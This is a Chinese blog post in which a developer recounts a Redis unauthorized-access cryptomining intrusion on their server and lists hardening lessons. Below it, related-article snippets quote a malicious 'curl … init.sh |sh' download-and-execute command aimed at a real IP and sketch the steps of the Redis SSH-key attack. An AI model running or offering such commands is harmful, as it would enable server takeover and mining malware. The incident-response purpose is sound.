攻击者利用Redis未授权访问漏洞进行新型入侵挖矿的事件分析

最新推荐文章于 2024-08-11 18:55:22 发布
最新推荐文章于 2024-08-11 18:55:22 发布
阅读量1.1k 收藏
点赞数 1
分类专栏: redis

攻击者利用Redis未授权访问漏洞进行新型入侵挖矿的事件分析
昨天我在博客中分享了自己服务器被攻击的一段病毒脚本——【谁干的】,安全方面不是很专业,只看懂了个大概,对着脚本将那些自动任务一一删除了,禁用了Redis对外开放,及时加了密码才使服务器能正常运转,上次的勒索病毒让我躲过了一劫,没想到这次因为自己的一时疏忽,竟然在第一时间就中招了……看看专业人士的分析吧

攻击者利用Redis未授权访问漏洞进行新型入侵挖矿的事件分析

病毒结构

其实这次除了服务中断了几小时,别的损失到也没有,但还是给我敲响了警钟,作为一个开发人员,也不能忽视安全问题,对于生产或者准生产环境的服务器,教训总结如下
(1)端口能不对外暴露尽量不要暴露
(2)防火墙规则一定要配置号,及时屏蔽异常ip的暴力破解
(3)千万千万不要设置root用户直接登陆服务器,密码强度足够,且不足为外人道也
(4)使用开源组件及时关注版本更新情况,更新补丁

总之,开发也要涉猎其他领域,遇到问题才不会慌了手脚,懂的更多,面对威胁也就能将潜在损失降到最低

轻尘×
关注
专栏目录
redis授权访问漏洞
SatanRiver的博客
08-15 454
一、了解漏洞 1、什么是redisredis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的api。 2.redis 授权访问是什么漏洞redis是默认绑定在0.0.0.0:6379,并且没有开启认证,如果没有采取相关的一些策略,比如添加防火墙规则避免其他非信任来源的ip访问等,将会导致redis服务直接暴露在公网,...
Redis授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1339
redis授权访问漏洞是一个由于redis服务版本较低其设置登录密码导致的漏洞攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用
redis 授权访问漏洞和防范
weixin_33851177的博客
11-05 100
通过nmap扫描开放redis 6379端口本机安装redis客户端,能连接远端redis数据库;(redis-cli)本机创建私钥和公钥,ssh-keygen -t rsa 一路回车;会在/root/.ssh/下生成私钥文件id_rsa和公钥id_rsa.pubredis-cli -h 192.168.3.14 链接远程redis数据库[root@hack bin]# ./...
Redis漏洞大全~讲解最全的漏洞利用方法
最新发布
weixin_67832625的博客
08-11 1009
Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。漏洞原理。
redis授权访问致远程植入挖矿脚本
煮酒闲谈
12-19 1755
前言遇到安全事件发生的时候,我们往往会有相应的处理流程与方法,但是作为一个萌新来说,对于安全事件的处理即应急响应还是比较陌生的,于是今天分享这样一篇文章。 安全应从小事做起,从细节做起 本文转载自<我的世界安全观>作者会不定期的更新一些与安全技术相关的干货,欢迎大家关注。1 安全事件描述1.1 开发服务器被勒索主机xx.xx.xx.xx出现异常:cpu高达700%,且登录出现访问外链的异常提醒:
记一次因redis授权访问漏洞被攻击进行挖矿
12-05 907
一、问题描述 redis存储的业务数据被清空,且被注入知的url下载链接: cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh 百度该链接后,发现是这是一段带有恶意链接脚本,进行恶意shell脚本下载,从而实现远程代码攻击,并进行挖矿行为。 二、分析 分析参考链接: https://www.freebuf.com/c...
redis授权导致服务器被挖矿分析(20220119)
fr1d4st的博客
01-27 2740
文章目录@[toc]0x00 背景0x01 现象0x02 临时处理0x03 溯源 0x00 背景 20220119收到阿里云报警短信 【阿里云】尊敬的******:云盾云安全中心检测到您的服务器:xx.xx.xx.xx(**)出现了紧急安全事件挖矿程序,建议您立即登录云安全中心控制台-安全告警处理http://a.aliyun.com/f1. 进行处理 。 登录阿里云控制台后发现有多条异常记录 恶意脚本代码执行(curl -s -L http://xx.xx.xx.xx/f220115rr/
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
前言 本文主要给大家介绍了关于Redis授权...攻击者授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。 漏洞描述 部分 Redis
Redis授权访问漏洞
周星星的博客
08-22 1533
Redis授权访问漏洞复现以及利用
Redis授权访问漏洞利用及防护措施(非常详细)
热门推荐
7Riven's blog
11-29 1万+
靶机(centos6.6):192.168.109.150 攻击机(kali-linux 2019.3):192.168.109.148 漏洞环境配置部署见:https://blog.csdn.net/qq_41210745/article/details/103305262 1.nmap存活主机扫描 2.发现疑似目标主机,扫描端口服务:找到目标端口6379 3.ka...
Redis授权访问漏洞复现(三种方式)
weixin_55843787的博客
03-29 9600
redis授权访问漏洞
恶意程序利用Redis授权访问缺陷入侵系统
当星宿都沉默
08-02 316
一、系统被入侵表现: 系统无法正常使用。 二、登录服务器查看: 系统被挖矿程序入侵,导致CPU占用极高。 三.解决方式: 1.关闭并彻底删除恶意程序 kill掉进程后,不一会儿进程有被启动。怀疑被植入了定时任务 通过crontab -l查看,果然被植入了定时任务,每五分钟获取并执行远程脚本。 最终将定时任务一并删除。 2.修改redis.conf配置文件: port/r...
Redis授权访问漏洞利用总结
cj_Hydra's Blog
06-24 1183
没有设置密码认证(一般为空),可以免密码远程登录redis服务。
开源Bug管理系统Redmine安装和使用心得
weixin_33724659的博客
08-03 199
        最终忍受不了公司使用论坛+Excel来进行bug反馈和管理工作了,于是花了一个上午时间研究了下bug管理系统。这样一个bug管理系统能够轻松的查看bug新增了哪些,攻克了哪些。当前是谁,要在什么时间解决。不管是qa还是程序都能够轻易的在这个系统上面查看当前要解决和复測的bug。        终于目标锁定为两个开源的项目管理系统,禅道和Redmine,两个都很优秀,而我的...
redmine-项目管理工具
走南闯北的专栏
11-23 1258
本文出处:http://blog.ossxp.com/2010/01/20/ redmine – 软件项目的催化剂 曾经有这样一位项目成员。 在项目主管的眼中,她既不是一个得力的开发人员,或测试人员,也不是有任何其他特长的人。 但在她就职的这家公司的12年间,凡是她从事过的项目都取得了巨大的成功。她为项目做了什么是不明显的,但是有她在项目总是成功的。 多年后,
阿里云服务器被攻击(请及时排查告警中提示的恶意URL,以及所下载的目录下的恶意文件)
10年IT大头兵
05-04 1627
收到阿里云提醒被攻击了: URL链接:http://185.181.10.234/e5db0e07c3d7be80v520/init.sh netstat -anp |grepSYN_SENT ###如果这个命令查出来很多,那就是被攻击了 首先:改服务器登录密码,或者检查密钥文件是否被改过。这两个点都先检查并修改。这时重启服务器。我的因为刚被攻击,那边还连着,我不重启,他还是能操作。...
阿里云提示服务器进程异常行为-访问恶意下载源
没有解答思路的博客
12-22 3989
最近公司的服务器(阿里云)一直给老板发信息说,服务器在访问恶意下载源。老板一开始没在意,后来一天一条短信,然后让我处理一下。作为一个后端工程师,普通的服务器维护在小公司基本都是自己上手来。废话太多了,下面具体描述一下我遇到问题的和解决方法,以便大家遇到了之后不知所措。(大佬们,不吝指教~) 一。问题描述 阿里云服务器警告截图: 阿里云提示服务器访问恶意下载源(****.init.sh) 看这种警告...
Redis授权访问漏洞(一)先导篇
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-09 1499
Redis默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上。如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis以及读取Redis的数据。
Redis配置不当致使root被提权漏洞
牧竹子
11-17 6763
Redis配置不当致使root被提权漏洞Dear all~ 最近Redis服务被曝出因配置不当,可能造成数据库被恶意清空,或被黑客利用写入后门文件造成进一步入侵,请关注!一、漏洞发布日期 2015年11月10日 二、已确认被成功利用的软件及系统 对公网开放,且启用认证的redis服务器。 三、漏洞描述 最近Redis服务被曝出因配置不当,被攻击者进行恶意利用。 黑客借助redi
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值